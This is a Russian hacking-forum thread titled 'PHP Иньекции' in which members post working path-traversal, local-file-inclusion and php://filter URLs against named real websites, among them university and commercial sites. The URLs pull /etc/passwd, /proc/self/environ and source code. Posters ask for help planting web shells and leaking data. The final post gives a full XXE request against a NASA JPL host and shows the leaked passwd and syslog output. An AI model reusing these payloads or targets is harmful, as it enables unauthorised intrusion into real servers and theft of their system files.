PHP Иньекции

Discussion in 'Уязвимости' started by Joker-jar, 20 Apr 2007.

  1. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Тиц 275,
     
    _________________________
    1 person likes this.
  2. MadFun.

    MadFun. Member

    Joined:
    8 May 2007
    Messages:
    32
    Likes Received:
    28
    Reputations:
    20
    PHP:
    _http://to-maxima.com/index.php?page=../../../../../../../etc/passwd
     
  3. Sk13

    Sk13 New Member

    Joined:
    19 Feb 2012
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    PHP:
    http://tubeofhell.com:80/index.php?p=../../../../../../../../your_patch_%00
     
  4. xxddz

    xxddz Elder - Старейшина

    Joined:
    2 Oct 2009
    Messages:
    706
    Likes Received:
    365
    Reputations:
    162
    http://kosmetika.potrebitel.ru/printer.php?../../../../../etc/passwd
     
  5. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    http://www.prp-energo.ru/download/load.phtml?file=index.php
     
  6. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    Добавляется расширение /php/, нулл байт не катит, зато катит слэшевая альтернатива =)
     
    _________________________
  7. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    http://crimas.ru/5_izdani/books/2004_isbn_6/index.php?file=php://filter/convert.base64-encode/resource=index
     
  8. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    http://www.photo1000.ru/index.php?node=../../../../../../../../../../../etc/passwd%00
     
    2 people like this.
  9. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    http://www.bid-qualitysummit.com/ru/page.php?d=php://filter/convert.base64-encode/resource=page
     
    2 people like this.
  10. pharm_all

    pharm_all Member

    Joined:
    10 Sep 2009
    Messages:
    106
    Likes Received:
    7
    Reputations:
    0
    Code:
    http://hea-www.harvard.edu/XJET/img-data.cgi?../../../../../../../../../../etc/passwd
    http://www2.selu.edu/Administration/Inst-Research/FacStaff/data.cgi?../../../../../../../../../../etc/hosts
    http://www.cs.uofs.edu/~pjs2f/index.cgi?incl=../../../../../../../../../etc/passwd
    http://www.cs.scranton.edu/~cmps/template.php?body=../../../../../../../../etc/passwd
    https://secweb.cs.odu.edu/~zeil/submit/websubmit.cgi?asstinfo=../../../../../../etc/passwd
    ps пишите если получится ливануть
     
    1 person likes this.
  11. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    http://anavalerobetran.com/?page=php://filter/convert.base64-encode/resource=index.php
     
    1 person likes this.
  12. kise

    kise Member

    Joined:
    29 Jan 2012
    Messages:
    52
    Likes Received:
    5
    Reputations:
    -4
    Если кто-нибудь куда-нибудь зальет шелл, будьте добры, напишите мне как вы это сделали.

    http://vincity.info/index.php?option=com_jesubmit&view=../../../../../../../../../../proc/self/environ%00
    http://razvlekaykaa.ru/index.php?option=com_bca-rss-syndicator&feed_id=1&controller=../../../../../../../../proc/self/environ%00
    http://psiyoga.ru/index.php?option=com_gcalendar&view=google&Itemid=71&controller=../../../../../../../etc/passwd%00
    http://www.old.skippers.ru/index.php?option=com_gcalendar&view=gcalendar&Itemid=40&gcalendarview=day&lang=ru&day=&controller=../../../../../../../proc/self/environ%000
    http://ms.cmc.msu.ru/index.php?option=com_gcalendar&view=gcalendar&Itemid=4&gcalendarview=week&year=2012&month=3&day=14&controller=../../../../../../etc/passwd%000
    http://keyave.ru/index.php?option=com_gcalendar&view=google&Itemid=55&controller=../../../../../../etc/passwd%00
     
    #1292 kise, 31 Mar 2012
    Last edited: 1 Apr 2012
    1 person likes this.
  13. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    http://www.pentictonherald.ca/stories_business.php?id=../../../index
     
  14. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    842
    Likes Received:
    170
    Reputations:
    84
    http://www.kyrgyz.ru/dict/dict.php?l=../../../../../../../../../../../etc/passwd%00
     
    2 people like this.
  15. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    http://www.advance-guard.net/index.php?id=index
     
  16. A_n_d_r_e_i

    A_n_d_r_e_i Elder - Старейшина

    Joined:
    2 Sep 2009
    Messages:
    200
    Likes Received:
    275
    Reputations:
    32
    Возьмут в роа
    Сорь за оффтоп
     
    2 people like this.
  17. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    http://skyvaledoaco.com.br/index.php?page=php://filter/convert.base64-encode/resource=index
     
  18. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    http://www.evisun.ru/index.php?option=com_ckforms&controller=../../../../../../../../etc/passwd%000
    http://rkkocenka.ru/index.php?option=com_ckforms&controller=../../../../../../../../../../../../etc/passwd%000
    http://www.school-potencial.ru/index.php?option=com_ckforms&controller=../../../../../../../../../../../../etc/passwd%00
    http://ledaro.ru/index.php?option=com_ckforms&controller=../../../../../../../../../../../../etc/passwd%000
     
    _________________________
    3 people like this.
  19. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    http://temchik.ru/index.php?page=/etc/passwd%00
     
  20. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    XML-Inject на NASA.GOV

    Отправляем специально сконфигурированный пакет:


    PHP:
    Content-Type = 'application/x-amf';
    Host = 'informal.jpl.nasa.gov';
    Content-Length = '904'; //тут длина вашего запроса. Величина варьируется

    Request.Data = '<?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE test [ <!ENTITY x3 SYSTEM "/etc/passwd"> ]>
    <amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx">
      <body>
          <object type="flex.messaging.messages.CommandMessage">
            <traits>
              <string>body</string><string>clientId</string><string>correlationId</string>
              <string>destination</string><string>headers</string><string>messageId</string>
              <string>operation</string><string>timestamp</string><string>timeToLive</string>
            </traits><object><traits />
            </object>
            <null /><string /><string />
            <object>
              <traits>
                <string>DSId</string><string>DSMessagingVersion</string>
              </traits>
              <string>nil</string><int>1</int>
            </object>
            <string>&x3;</string>
      <int>5</int><int>0</int><int>0</int>
      </object>
      </body>
    </amfx>
    На что видим ответ

    PHP:
    Response.Data 
    root:x:0:0:Super-User:/:/sbin/sh 
    daemon
    :x:1:1::/: bin:x:2:2::/usr/bin:/bin/false 
    sys
    :x:3:3::/: adm:x:4:4:Admin:/var/adm:/bin/false
    lp
    :x:71:8:Line Printer Admin:/usr/spool/lp:/bin/false 
    uucp
    :x:5:5:uucp Admin:/usr/lib/uucp:/bin/false nuucp:x:9:9:uucp 
    Admin
    :/var/spool/uucppublic:/bin/false smmsp:x:25:25:SendMail 
    Message Submission Program
    :/:/bin/false listen:x:37:4:Network 
    Admin
    :/usr/net/nls:/bin/false gdm:x:50:50:GDM 
    Reserved UID
    :/:/bin/false webservd:x:80:80:WebServer 
    Reserved UID
    :/opt/home/webservd:/bin/pfsh 
    postgres
    :x:90:90:PostgreSQL Reserved UID:/:/usr/bin/pfksh 
    svctag
    :x:95:12:Service Tag UID:/: nobody:x:60001:60001:NFS 
    Anonymous Access User
    :/:/bin/false noaccess:x:60002:60002:No 
    Access User
    :/:/bin/false nobody4:x:65534:65534:SunOS 4.x NFS 
    Anonymous Access User
    :/:/bin/false metrics:x:150:10:System 
    Metrics Account
    :/opt/metrics:/bin/sh pdiag:x:153:10:Patchdiag 
    Account
    :/opt/pdiag:/bin/sh sysaudit:x:152:10:System Audit 
    Account
    :/opt/sysaudit:/bin/sh +@jplit-sa:x:::::: +@web:x:::::: 
    Вариация первого запроса:

    PHP:
    Content-Type = 'application/x-amf';
    Host = 'informal.jpl.nasa.gov';
    Content-Length = '904'; //тут длина вашего запроса. Величина варьируется

    Request.Data = '<?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE test [ <!ENTITY x3 SYSTEM "/etc/syslog.conf"> ]>
    <amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx">
      <body>
          <object type="flex.messaging.messages.CommandMessage">
            <traits>
              <string>body</string><string>clientId</string><string>correlationId</string>
              <string>destination</string><string>headers</string><string>messageId</string>
              <string>operation</string><string>timestamp</string><string>timeToLive</string>
            </traits><object><traits />
            </object>
            <null /><string /><string />
            <object>
              <traits>
                <string>DSId</string><string>DSMessagingVersion</string>
              </traits>
              <string>nil</string><int>1</int>
            </object>
            <string>&x3;</string>
      <int>5</int><int>0</int><int>0</int>
      </object>
      </body>
    </amfx>
    На что видим ответ

    PHP:
    Response.Data 
    #ident "@(#)syslog.conf 1.5 98/12/14 SMI" /* SunOS 5.0 */ # 
    # Copyright (c) 1991-1998 by Sun Microsystems, Inc. 
    # All rights reserved. # 
    # syslog configuration file. # 
    # This file is processed by m4 so be careful to quote (`') names 
    # that match m4 reserved words. Also, within ifdef's, arguments 
    # containing commas must be quoted. # 
    # JPLIT syslog.conf # last updated 2008-06-24 
    # *.err;kern.notice;auth.notice /dev/sysmsg *.info;kern.debug;auth.err;mail.crit;local0.crit 
    /var/adm/messages 
    *.alert;kern.err;daemon.err operator 
    *.alert root *.emerg 
    auth.notice /var/log/authlog mail.info /var/log/syslog 
    # Log ipfilter info separately: local0.info /var/log/ipflog 
    # if a non-loghost machine chooses to have authentication messages 
    # sent to the loghost machine, un-comment out the following line: 
    #auth.notice ifdef(`LOGHOST', /var/log/authlog, @loghost) #mail.debug ifdef(`LOGHOST', /var/log/syslog, @loghost) # 
    # non-loghost machines will use the following lines to cause "user" 
    # log messages to be logged locally. # ifdef(`LOGHOST', , user.err /dev/sysmsg user.err /var/adm/messages user.alert `root, operator' user.emerg * ) # # 
    # Uncomment this line to send syslog data to JPL Security: 
    # *.err;daemon.notice;auth.info @jplnsm.jpl.nasa.gov 
    # 3DB8AF0E-381B-5C34-E477-F5E594ECC3360.03DB8AF0E-380E-7324-6A71-ABBB0CDA7BAF 
    Скоро выложу самописную утилитку для прогулки по директориям =)
     
    _________________________
    8 people like this.